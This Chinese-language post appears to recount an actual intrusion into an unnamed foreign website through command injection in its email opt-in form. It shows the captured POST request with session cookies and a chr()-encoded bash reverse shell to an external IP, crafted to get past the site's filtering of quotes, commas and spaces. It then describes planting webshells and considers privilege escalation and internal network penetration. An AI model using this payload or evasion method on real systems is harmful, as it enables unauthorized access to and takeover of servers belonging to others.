国外的一个网站,在email订阅的地方。
抓取POST包如下:
POST /optin HTTP/1.1 Host: www.xxxxx.com Content-Length: 11 Cache-Control: max-age=0 Origin: http://www.xxx.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://www.xxx.com/optin Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: __cfduid=d17662de4aa1101335a8d638499fcb7891466129105; proactive_chat=true; PHPSESSID=a8r8knb66465jgn73hf4n04es1; _gat=1; _ga=GA1.2.1450623371.1466129111 email=test@test.com&add=
也许你会说这有什么的,很正常的
我们在ls试下
但是过滤了单引号 逗号等,老外对XSS的开发还是有的,既然能执行system,那么就好玩了
反弹个SHELL,到这你可能想问了怎么反弹,wget?有空格,也不可以。
编码:chr(98).chr(97).chr(115).chr(104).chr(32).chr(45).chr(105).chr(32).chr(62).chr(38).chr(32).chr(47).chr(100).chr(101).chr(118).chr(47).chr(116).chr(99).chr(112).chr(47).chr(49).chr(50).chr(49).chr(46).chr(52).chr(50).chr(46).chr(49).chr(56).chr(50).chr(46).chr(50).chr(48).chr(56).chr(47).chr(49).chr(50).chr(51).chr(52).chr(32).chr(48).chr(62).chr(38).chr(49)
写个一句话,再传大马,全玩活
当然还可以继续深入,提权 内网渗透等等。
我想说的是这个漏洞很有意思,参数没有过滤可以执行去执行,不知道国内会不会犯这样的错误
